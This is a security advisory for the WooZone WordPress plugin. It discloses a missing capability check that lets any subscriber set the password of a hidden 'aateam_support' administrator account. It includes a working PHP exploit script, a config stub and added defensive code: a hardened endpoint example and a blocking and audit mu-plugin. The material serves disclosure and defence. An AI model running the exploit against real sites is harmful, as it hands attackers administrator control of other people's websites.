WooZone - WooCommerce Amazon Affiliates [Authenticated Unrestricted Create/Update Admin User Password]
This vulnerability is related to DWF-2017-87001, check WooZone - WooCommerce Amazon Affiliates [Arbitrary File Upload] for details.
Description
Exploiting the missing capability check in the AJAX action mentioned in the aforementioned report allows an authenticated user to create, or update the password of, an administrator user that the plugin creates in order to give its developers a convenient way of providing support.
This plugin creates a user with administrative privileges and the username aateam_support and emails the credentials to [email protected]. This can safely be considered a backdoor. In any case, an attacker is able to update this user's password to an arbitrary value and then use this password to log in to the vulnerable website.
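For contrast with the vulnerable handler, here is how a remote-support AJAX endpoint should be written in WordPress. This is an added example, not WooZone's code: the hook name, nonce action, parameter names and the user-meta key are assumptions chosen for illustration. It enforces an authorization check and a nonce before touching any account, never accepts a caller-supplied password, creates the support account with a non-administrator role, and schedules it for removal.

```php
<?php
/*
 * Added example (not WooZone's code). Hook name, nonce action, parameter
 * names and the meta key are assumptions chosen for illustration.
 */
add_action('wp_ajax_example_remote_support_request', 'example_remote_support_request');
add_action('example_remote_support_cleanup', 'example_remote_support_cleanup');

function example_remote_support_request() {
    // 1. Authorization: only a user who may create and edit users (i.e. an
    //    administrator on a single site) may reach the rest of this handler.
    //    This is the check the vulnerable action lacks.
    if (!current_user_can('create_users') || !current_user_can('edit_users')) {
        wp_send_json_error(['message' => 'Insufficient privileges'], 403);
    }

    // 2. CSRF protection: the request must carry a nonce issued for this action.
    check_ajax_referer('example_remote_support', 'nonce');

    // The PoC sends the real parameters URL-encoded inside one 'params' field;
    // the same shape is assumed here and decoded with parse_str().
    $params = [];
    parse_str(isset($_POST['params']) ? wp_unslash($_POST['params']) : '', $params);
    if (empty($params['create_wp_credential']) || $params['create_wp_credential'] !== 'yes') {
        wp_send_json_error(['message' => 'Nothing to do'], 400);
    }

    // 3. Never accept a caller-chosen password: generate a strong one server-side.
    $password = wp_generate_password(24, true, true);
    $username = 'example_support_' . strtolower(wp_generate_password(6, false, false));

    // 4. Least privilege: a support account does not need to be an administrator.
    $user_id = wp_insert_user([
        'user_login' => $username,
        'user_pass'  => $password,
        'role'       => 'editor',
    ]);
    if (is_wp_error($user_id)) {
        wp_send_json_error(['message' => $user_id->get_error_message()], 500);
    }

    // 5. Expiry: record when the account should disappear and schedule cleanup.
    update_user_meta($user_id, 'example_support_expires', time() + DAY_IN_SECONDS);
    if (!wp_next_scheduled('example_remote_support_cleanup')) {
        wp_schedule_event(time() + HOUR_IN_SECONDS, 'hourly', 'example_remote_support_cleanup');
    }

    // 6. Audit trail: who created which account.
    error_log(sprintf('remote support account %s created by user %d', $username, get_current_user_id()));

    wp_send_json_success(['username' => $username, 'password' => $password]);
}

// Deletes support accounts whose expiry time has passed, reassigning their
// content to user 1 (assumed to be the site owner).
function example_remote_support_cleanup() {
    require_once ABSPATH . 'wp-admin/includes/user.php';
    $expired = get_users([
        'meta_key'     => 'example_support_expires',
        'meta_value'   => time(),
        'meta_compare' => '<',
        'fields'       => 'ID',
    ]);
    foreach ($expired as $user_id) {
        wp_delete_user((int) $user_id, 1);
    }
}
```

The capability check comes first and on its own, because `check_ajax_referer()` only proves the request originated from a page that was given a nonce, not that the caller is allowed to perform the action; a subscriber who obtains a nonce must still be refused by the capability test.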
PoC
The source files were provided by Brad from a hacked website. It seems like the remote_support module is missing the config.php file. Without it the module won't load and this attack will fail. The contents of the config.php file should look like this:
<?php
echo json_encode(
    array(
        'remote_support' => array(
            'version' => '1.0',
            'menu' => array(
                'order' => 20,
                'show_in_menu' => true,
                'title' => 'Remote support',
                'icon' => 'images/16.png'
            ),
            /*'in_dashboard' => array(
                'icon' => 'images/32.png',
                'url' => admin_url("admin.php?page=WooZone_remote_support")
            ),*/
            'help' => array(
                'type' => 'remote',
                'url' => 'http://docs.aa-team.com/woocommerce-amazon-affiliates/documentation/price_select/'
            ),
            'description' => "....",
            'module_init' => 'init.php',
            'load_in' => array(
                'backend' => array(
                    'admin.php?page=WooZone_remote_support',
                    'admin-ajax.php'
                ),
                'frontend' => false
            ),
            'javascript' => array(
                'admin',
                'hashchange',
                'tipsy',
                'thickbox'
            ),
            'css' => array(
                'admin',
                'tipsy'
            )
        )
    )
);
Actual exploit:
#!/usr/bin/env php
<?php
/*******************************************************************************
 * WooZone - WooCommerce Amazon Affiliates [Authenticated Unrestricted Create/Update Admin User Password]
 *
 * Exploit Author: Pan Vag <[email protected]>
 * To install deps run `composer install`
 ******************************************************************************/
require_once 'vendor/autoload.php';

use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\Session;
use Wordfence\ExKit\WPAuthentication;

// Target site URL (prompted for if not already configured).
Config::get('url.base', null, true, 'Enter the site URL')
    || ExitCodes::exitWithFailedPrecondition('You must enter a valid URL');

$s = new Session();
$s->XDebugOn();

// Authenticate as a low-privilege (subscriber) account.
Cli::writeInfo('Authenticating...');
WPAuthentication::logInAsUserRole($s, WPAuthentication::USER_ROLE_SUBSCRIBER);

$username = 'aateam_support';
$pass = uniqid();

Cli::writeInfo('Attempting to create a user with admin access or update the password of the current user to '.$pass.'...');
$postData = [
    'action' => 'WooZoneRemoteSupportRequest',
    'sub_actions' => 'access_details',
    'params' => http_build_query([
        'WooZone-create_wp_credential' => 'yes',
        'WooZone-password' => $pass,
    ]),
];
$r = $s->post(Endpoint::adminAjaxURL(), [], $postData);
$rJson = @json_decode($r->body);
if (!$r->success || !$rJson || !isset($rJson->status) || $rJson->status != 'valid') {
    ExitCodes::exitWithFailed('Failed to exploit');
}

// Verify the result by logging in as the support account with the new password.
Cli::writeInfo('Validating exploitation...');
$s = new Session();
WPAuthentication::logInAsUser($s, $username, $pass);
Cli::writeSuccess('Exploitation successful');
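A site operator who cannot immediately remove or update the plugin can put a guard in front of the vulnerable action and audit the backdoor account. The following must-use plugin is an added example, not part of the advisory or of WooZone: the AJAX action, sub-action and account name are the ones the PoC above sends, while the function names, the log format and the assumption that the plugin registers its own handler at the default priority 10 are mine.

```php
<?php
/*
 * Plugin Name: Example WooZone remote-support guard
 * Description: Added example (not part of the advisory or of WooZone). Place in
 *              wp-content/mu-plugins/ as a stop-gap until the plugin is fixed
 *              or removed. Assumes WooZone hooks its handler at priority 10.
 */

// 1. Block: run at priority 1, before the plugin's own handler, and refuse the
//    access_details sub-action for anyone who may not manage users. The action
//    and parameter names are those the advisory's PoC sends.
add_action('wp_ajax_WooZoneRemoteSupportRequest', 'example_guard_remote_support', 1);

function example_guard_remote_support() {
    $sub = isset($_POST['sub_actions']) ? sanitize_text_field(wp_unslash($_POST['sub_actions'])) : '';
    if ($sub !== 'access_details') {
        return; // other sub-actions are outside this advisory's scope
    }
    if (current_user_can('create_users') && current_user_can('edit_users')) {
        return; // a genuine administrator may still use the feature
    }
    error_log(sprintf(
        'Blocked WooZone access_details request: user=%d ip=%s',
        get_current_user_id(),
        isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
    ));
    // wp_send_json_error() ends the request with wp_die(), so the plugin's
    // handler registered at priority 10 never runs.
    wp_send_json_error(['message' => 'Forbidden'], 403);
}

// 2. Audit: report whether the support account named in the advisory exists
//    and whether it holds the administrator role.
function example_audit_support_account($login = 'aateam_support') {
    $user = get_user_by('login', $login);
    if (!$user) {
        return ['exists' => false];
    }
    return [
        'exists'     => true,
        'id'         => $user->ID,
        'is_admin'   => in_array('administrator', (array) $user->roles, true),
        'registered' => $user->user_registered,
        'email'      => $user->user_email,
    ];
}

// 3. Remediate: delete the account, reassigning its content to the user whose
//    ID is given (1 is assumed to be the site owner). Call this deliberately,
//    for example from an admin-only page, after reviewing the audit result.
function example_remove_support_account($login = 'aateam_support', $reassign_to = 1) {
    require_once ABSPATH . 'wp-admin/includes/user.php';
    $user = get_user_by('login', $login);
    if (!$user) {
        return false;
    }
    return wp_delete_user($user->ID, $reassign_to);
}
```

Beyond the guard, the entries written by `error_log()` give a simple detection signal: any blocked request for a site that never uses the remote-support feature is worth investigating, and an existing `aateam_support` administrator on a site whose owner did not knowingly request support should be treated as compromised and removed.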
- Date: 5 June 2017
- Author: Pan Vagenas
- Marketplace: codecanyon.net
- Plugin: WooZone - WooCommerce Amazon Affiliates
- Plugin version: 9.0.2.17
- WordPress version: 4.7.0
- Identifier: DWF-2017-87015